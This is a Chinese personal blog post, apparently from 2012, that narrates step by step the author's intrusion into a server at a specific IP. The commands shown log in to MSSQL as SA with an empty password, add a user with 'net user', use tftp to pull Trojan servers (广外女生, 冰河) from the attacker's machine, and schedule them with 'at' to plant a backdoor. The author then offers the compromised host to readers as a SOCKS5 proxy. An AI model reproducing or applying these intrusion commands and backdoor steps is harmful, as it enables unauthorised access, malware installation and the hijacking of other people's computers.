注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

蓝调5301438的知识仓库

蓝调千人QQ群:189619078

 
 
 

日志

 
 

8.简单入侵  

2012-04-17 15:54:06|  分类: 电脑知识 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

  电脑黑客认识

8.简单入侵 - 张佩辰 - 张佩辰之家

8.简单入侵 

        8.简单入侵 - 张佩辰 - 张佩辰之家

      看看这主机是否是网站先,用IE打开它的IP:61。170。168。168,出现“该页无法显示”。看来这主机还没WEB网页。祭起我的“X-SCAN”宝刀,全面扫描一下它的各种漏洞,我就不信他没有漏洞!
(玩黑必备一:眼睛长到头顶上)
X-SCAN扫描结果报告:
“端口开放:1433、3389
ASP 漏洞:don't find CGI漏洞: don't find IIS漏洞don't find……,SQL:SA /NULL”
呵呵,大局已定,大家看到了有哪些漏洞吗?什么,你不懂鸟语?哇噻,你先去补习鸟语再到我这来!
对了,我们的白灵、流二位大虾精通由各种乱码加鸟语组成的火星ASP语言,听说二位不日将移民火星,
你趁他们还在地球快去拜师学艺啊!
再接着卖我的黄婆烂瓜……
3389——我得最爱!利用远程主机打开的远程控制功能(通过3389连接)进入它的WINDOWS图形界面,这种感觉对我等菜鸟来说可不是DOS破界面能比的哦~~
废话少说,打开我的“WINDOW2000远程客户程序”,填IP、点“联接”~~啊?连不上!再连~~还是不行
!55555……输入法漏洞是玩不成了。
一招不行再换一招!点根烟先……打开“天行网络”所制的精品软件——SQLEXEC,填上IP,用户名:
SA,密码为空,点“连接”---“:(连接成功!”
进来了,谈笑间我就进来了,我真厉害~~(玩黑必备二:自夸不怕吓死人)。先看看它的C盘的文件:
DIR C:,OK!这机子装的是WINNT,怪不得我用WIN2000的远程客户程序连不上,可是它怎么会打开
WIN2000的远程连接用端口-3389端口呢?
算了,越想越乱,忙我的正事吧。
为安全起见,让我看看它建立了哪些连接进程:“netstat -n”……哈,反馈回来的信息都是一些
196开头的IP,没开TTY监听,这该不会是个局域网的服务器吧?
再来看看我现在的权限有多少:“net user aaa 1234 /add”---“成功建立新用户”。呵呵,
权限还不小,能建新用户哦~~由于我机子用的是WIN98,所以没法用这新建的用户名为AAA,密码
为1234的帐户进行连接,这帐户对我来说根本
没用……
现在,我们即将开始取得远程主机的最最最……大权限!啥?你不信?呵呵,说你菜你还不高兴,
听说过木马吗?听说过大名鼎鼎专玩木马的“符号”大虾吗?哦,你不知木马只知符大虾……行,
赶明儿我让符大虾在你机子里也放个木马,这样你就
能深刻理解啥叫木马了~~
继续攻击……我们现在就要上传个木马到远程主机。木马“广外女生”现在国内很流行,前几天也曾去黑网下栽了一个,它的被控端程序才90K,上传比较容易,就用它做远程主机的“后门”吧。1。
打开TFTP(一个能把你的PC变成FTP服务器的小程序)——
2。把“广外女生”的被控端程序gw.exe复制到我的C盘TFTP默认文件路径下。3。在远程主机里输入命令:"tftp -i xx.xx.xx.xx get gw.exe c:\gw.exe"
5分钟后,GW。EXE已乖乖在躺在远程主机的C盘里了~~~
现在,得想法子运行GW。EXE:1。打入命令"net time"---远程主机反馈当前时间"09:35"。 2.打入程序起动时间命令"at 09:37 c:\gw.exe"(GW在9:37运行)——出现主机反应:“建立一个新任务,
ID=1”
OK!二分钟后将运行我的“广外女生”了!
打开我的“广外”控制端程序,在主机查找栏里填上“61.170.168.160---61.171.168.170”,点“查找”。扫描很慢……别急……扫完了……啊?!在这扫描的IP端里无中“奖”主机!怪事啊!
是远程主机的“广外”没有运行还是我对这控制端程序的操
作错误?一定是这破“广外”本身程序不行,太烂了~~(玩黑必备三:一切都不是我的错!)。
看来,今天我只得请出封存已久的国货精品木马——“冰河”了。我的“冰河2。2”的被控端有200多K,估计上传时间会很久,但如果上传成功,它的功能可不是“广外”所能与之并论的啊!另外,
对冰河的界面操作也不会似“广外”那嚒陌生……
言归正传,现在开始上传“冰河”:“tftp -i xx.xx.xx.xx get G-server.exe c:\inetpub\GG.exe"(为不至于太过醒目,这次把文件传到C盘的INETPUB文件包下)
缓慢上传中……让我再点根烟,趁这功夫去“黑白网络”的技术论坛逛逛去…… \已过25分钟了,进远程主机瞧瞧是否已下栽成功了~~OK!冰河已在那里了。接着:“net time”,反馈信息:10:30”。“at 10:32 c:\inetpub\GG.exe”,反馈信息“运行新任务,ID=1” 二分钟后,打开“冰河”控制端,加入远程主机IP,连接……成功!接着再:添加服务器端连接密码、添加冰河运行自动通知发往信箱、删除“广外”、“冰河”被控端程序。
……
        现在,这主机的一切已尽在我眼前了,真爽啊!明天,我也许会把一个SOCK5代理的服务器端程序放进这主机,大家以后要是想用SOCK5代理,又懒得去漫无目标的查找的话,请找我,我会把我这个人专用“肉机”贡献出来的

 

                          

8.简单入侵 - 张佩辰 - 张佩辰之家

 

  评论这张
 
阅读(168)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017